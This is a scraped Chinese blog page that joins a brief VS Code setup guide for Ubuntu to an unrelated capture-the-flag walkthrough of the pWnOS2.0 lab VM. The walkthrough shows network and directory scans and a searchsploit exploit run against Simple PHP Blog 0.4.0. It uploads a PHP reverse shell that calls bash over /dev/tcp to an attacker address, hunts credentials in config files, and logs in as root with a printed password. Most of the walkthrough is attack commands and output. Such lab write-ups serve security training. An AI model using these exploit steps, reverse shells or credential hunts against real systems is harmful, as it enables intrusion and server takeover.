OS-Linux-Ubuntu-Tool-vscode
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了OS-Linux-Ubuntu-Tool-vscode相关的知识,希望对你有一定的参考价值。
OS-Linux-Ubuntu-Tool-vscode
在Ubuntu上,可以使用vscode进行代码调试。
vscode官网如下:https://code.visualstudio.com/
对于Ubuntu,提供deb包。
下载deb包,在同级路径中打开终端,使用以下指令安装:sudo dpkg -i code_1.77.1-1680651665_amd64.deb
Ubuntu的图形界面中Show Applications翻页可以看到安装好的vscode图标。
添加收藏->鼠标右键vscode图标,提示可以添加到收藏,能快速启动VS从的。
vscode Extension
- C/C++ v1.14.5
- C/C++ Extension Pack
- C/C++ Themes
- Python v2023.6.0
- ...
vscode 调试C++
https://code.visualstudio.com/docs
sudo apt-get install g++ gcc cmakeg++ -vgcc -vcmake -version- 打开vscode,创建main.cpp,写一个Demo(main.cpp)。
- F5(Start Debugging)即可。
- 因为是第一次Debug,先选择调试器,生成相对应的配置文件夹
.vscode,以及json格式配置文件,如tasks.json。
同时生成输出文件如main。 - 可以先添加配置文件,再Debug。
- 菜单栏->Run->Add Configurations
- 左侧->RUN AND DEBUG
vscode .vscode 配置文件
- launch.json 可执行文件生成位置等
- tasks.json 编译链接相关参数等
- c_cpp_properties.json 其中:includePath包含第三方头文件
- ...
本文来自博客园,作者:Theseus‘Ship,转载请注明原文链接:https://www.cnblogs.com/yongchao/p/17297822.html
pWnOS2
pWnOS2.0
1、主机发现
-
主机发现
┌──(de1te㉿de1te)-[~] └─$ sudo nmap -sn 10.10.10.0/24 [sudo] de1te 的密码: Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:00 CST Nmap scan report for 10.10.10.1 Host is up (0.00055s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 10.10.10.15 Host is up (0.000050s latency). MAC Address: 00:50:56:FD:40:27 (VMware) Nmap scan report for 10.10.10.100 Host is up (0.00010s latency). MAC Address: 00:0C:29:5F:8B:AA (VMware) Nmap scan report for 10.10.10.254 Host is up (0.00014s latency). MAC Address: 00:50:56:ED:BE:4A (VMware) Nmap scan report for 10.10.10.90 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.82 seconds- 靶机地址为:
10.10.10.100
- 靶机地址为:
2、端口扫描
-
开放端口扫描
┌──(de1te㉿de1te)-[~] └─$ sudo nmap --min-rate 10000 -p- 10.10.10.100 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:03 CST Nmap scan report for 10.10.10.100 Host is up (0.00010s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:5F:8B:AA (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds- 开放了
22,80端口
- 开放了
-
扫描开放端口的服务及版本
┌──(de1te㉿de1te)-[~] └─$ sudo nmap -sT -sV -O -p22,80 10.10.10.100 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:04 CST Nmap scan report for 10.10.10.100 Host is up (0.00049s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.17 ((Ubuntu)) MAC Address: 00:0C:29:5F:8B:AA (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.32 - 2.6.39 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.66 seconds- 常规情况下,扫两次。防止网络问题影响结果。
UDP扫描
┌──(de1te㉿de1te)-[~] └─$ sudo nmap -sU -p22,80 10.10.10.100 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:06 CST Nmap scan report for 10.10.10.100 Host is up (0.00024s latency). PORT STATE SERVICE 22/udp closed ssh 80/udp closed http MAC Address: 00:0C:29:5F:8B:AA (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds -
常见漏洞扫描
┌──(de1te㉿de1te)-[~] └─$ sudo nmap -script=vuln -p22,80 10.10.10.100 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:07 CST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 10.10.10.100 Host is up (0.00031s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-enum: | /blog/: Blog | /login.php: Possible admin folder | /login/: Login page | /info.php: Possible information file | /icons/: Potentially interesting folder w/ directory listing | /includes/: Potentially interesting directory w/ listing on \'apache/2.2.17 (ubuntu)\' | /index/: Potentially interesting folder | /info/: Potentially interesting folder |_ /register/: Potentially interesting folder |_http-dombased-xss: Couldn\'t find any DOM based XSS. |_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities. | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.100 | Found the following possible CSRF vulnerabilities: | | Path: http://10.10.10.100:80/register.php | Form id: | Form action: register.php | | Path: http://10.10.10.100:80/login.php | Form id: |_ Form action: login.php |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | http-cookie-flags: | /: | PHPSESSID: | httponly flag not set | /login.php: | PHPSESSID: | httponly flag not set | /login/: | PHPSESSID: | httponly flag not set | /index/: | PHPSESSID: | httponly flag not set | /register/: | PHPSESSID: |_ httponly flag not set MAC Address: 00:0C:29:5F:8B:AA (VMware) Nmap done: 1 IP address (1 host up) scanned in 55.66 seconds
总结:开放了22,80端口,我们可以尝试从80端口出发。服务器内核版本较低。
3、Web渗透
-
目录爆破
┌──(de1te㉿de1te)-[~] └─$ sudo gobuster dir -u http://10.10.10.100 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.100 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s =============================================================== 2023/04/07 10:24:38 Starting gobuster in directory enumeration mode =============================================================== /includes (Status: 301) [Size: 315] [--> http://10.10.10.100/includes/] /register (Status: 200) [Size: 1562] /login (Status: 200) [Size: 1174] /blog (Status: 301) [Size: 311] [--> http://10.10.10.100/blog/] /info (Status: 200) [Size: 49871] /index (Status: 200) [Size: 854] /activate (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php] /server-status (Status: 403) [Size: 293] Progress: 21892 / 62285 (35.15%)[ERROR] 2023/04/07 10:24:42 [!] parse "http://10.10.10.100/error\\x1f_log": net/url: invalid control character in URL /index (Status: 200) [Size: 854] Progress: 61574 / 62285 (98.86%) =============================================================== 2023/04/07 10:24:48 Finished =============================================================== -
浏览网页
80端口
里面有个login,但是手工注入发现不行
http://10.10.10.100/includes/
有config文件,但是我们下载下来,里面是空的
http://10.10.10.100/blog/index.php
- 上面说是
Simple PHP Blog 0.4.0 - 简单搜索了一下,发现是一个简单的博客系统。看看有啥漏洞没
┌──(de1te㉿de1te)-[~] └─$ searchsploit simple php blog ----------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- --------------------------------- Insanely Simple Blog 0.4/0.5 - \'index.php\' SQL Injection | php/webapps/30317.txt Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting | php/webapps/30318.txt Insanely Simple Blog 0.5 - SQL Injection | php/webapps/5774.txt Simple Blog PHP 2.0 - Multiple Vulnerabilities | php/webapps/40518.txt Simple Blog PHP 2.0 - SQL Injection | php/webapps/40519.txt Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution | php/webapps/6311.php Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities | php/webapps/4557.txt Simple PHP Blog 0.4 - \'colors.php\' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26463.txt Simple PHP Blog 0.4 - \'preview_cgi.php\' Multiple Cross-Site Scripting Vulnerabilit | cgi/webapps/26461.txt Simple PHP Blog 0.4 - \'preview_static_cgi.php\' Multiple Cross-Site Scripting Vulne | cgi/webapps/26462.txt Simple PHP Blog 0.4.0 - Multiple Remote s | php/webapps/1191.pl Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb Simple PHP Blog 0.4.7.1 - Remote Command Execution | php/webapps/1581.pl Simple PHP Blog 0.5.1 - Local File Inclusion | php/webapps/10604.pl Simple PHP Blog 0.5.x - \'search.php\' Cross-Site Scripting | php/webapps/33507.txt Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin) | php/webapps/40475.txt SimpleBlog 2.0 - \'comments.asp\' SQL Injection (2) | php/webapps/2232.pl SimpleBlog 3.0 - Database Disclosure | php/webapps/7232.txt Super Simple Blog Script 2.5.4 - \'entry\' SQL Injection | php/webapps/9180.txt Super Simple Blog Script 2.5.4 - Local File Inclusion | php/webapps/9179.txt ----------------------------------------------------------------------------------- ---------------------------------- 确实存在漏洞
searchexploit -m 1191- 下载文件1191.pl
使用说明·
- 感觉可以利用的东西很多啊
-
方式一:
perl 1191.pl -h http://10.10.10.100/blog -e 1
上传的cmd文件,就是一个简单的一句话木马
-
方式二
perl 1191.pl -h http://10.10.10.100/blog/ -e 3 -U 123 -P 123
就可成功登陆后台
有一个上传照片的地方,看看能不能上传其他文件
<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.10.90/443 0>&1\'") ?>
上传成功了
总结两种方法都是可以的,最终实现的方法还是将文件上传到
images的文件夹下 - 上面说是
4、提权
我们刚刚通过simple php blog 漏洞上传了我们的反弹shell
sudo nc -lvnp 443 # 开启443端口监听
www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
没有tty,看看有没有安装python
dpkg -l
python -c "import pty;pty.spawn(\'/bin/bash\')"
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
da
Sorry, try again.
[sudo] password for www-data:
da
Sorry, try again.
sudo: 3 incorrect password attempts
- 我们不知道密码
到目前为止一切准备就绪,就开始提权了。emm,看看有没有敏感文件泄露吧
www-data@web:/var/www/blog$ cd ..
cd ..
www-data@web:/var/www$ ls
ls
activate.php includes info.php mysqli_connect.php
blog index.php login.php register.php
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE (\'DB_USER\', \'root\');
DEFINE (\'DB_PASSWORD\', \'goodday\');
DEFINE (\'DB_HOST\', \'localhost\');
DEFINE (\'DB_NAME\', \'ch16\');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die (\'Could not connect to MySQL: \' . mysqli_connect_error() );
username : root password:goodday
尝试一下
www-data@web:/var/www$ mysql -u root -p
mysql -u root -p
Enter password: goodday
ERROR 1045 (28000): Access denied for user \'root\'@\'localhost\' (using password: YES)
密码不正确?!!!
但是,这个web服务还是开启的。说明,肯定有一个地方是存在真正的配置文件的
www-data@web:/var/www$ cd ..
cd ..
www-data@web:/var$ ls
ls
backups crash lib lock mail opt spool uploads
cache index.html local log mysqli_connect.php run tmp www
www-data@web:/var$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE (\'DB_USER\', \'root\');
DEFINE (\'DB_PASSWORD\', \'root@ISIntS\');
DEFINE (\'DB_HOST\', \'localhost\');
DEFINE (\'DB_NAME\', \'ch16\');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die (\'Could not connect to MySQL: \' . mysqli_connect_error() );
- 果然!!!
ssh连接一下
┌──(de1te㉿de1te)-[~]
└─$ sudo ssh root@10.10.10.100
root@10.10.10.100\'s password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)
* Documentation: http://www.ubuntu.com/server/doc
System information as of Fri Apr 7 02:15:10 EDT 2023
System load: 0.0 Processes: 82
Usage of /: 2.9% of 38.64GB Users logged in: 0
Memory usage: 26% IP address for eth0: 10.10.10.100
Swap usage: 0%
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~#
定妆照:
root@web:~# whoami
root
root@web:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:5f:8b:aa brd ff:ff:ff:ff:ff:ff
inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
inet6 fe80::20c:29ff:fe5f:8baa/64 scope link
valid_lft forever preferred_lft forever
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~# sudo -l
Matching Defaults entries for root on this host:
env_reset
User root may run the following commands on this host:
(ALL : ALL) ALL
以上是关于OS-Linux-Ubuntu-Tool-vscode的主要内容,如果未能解决你的问题,请参考以下文章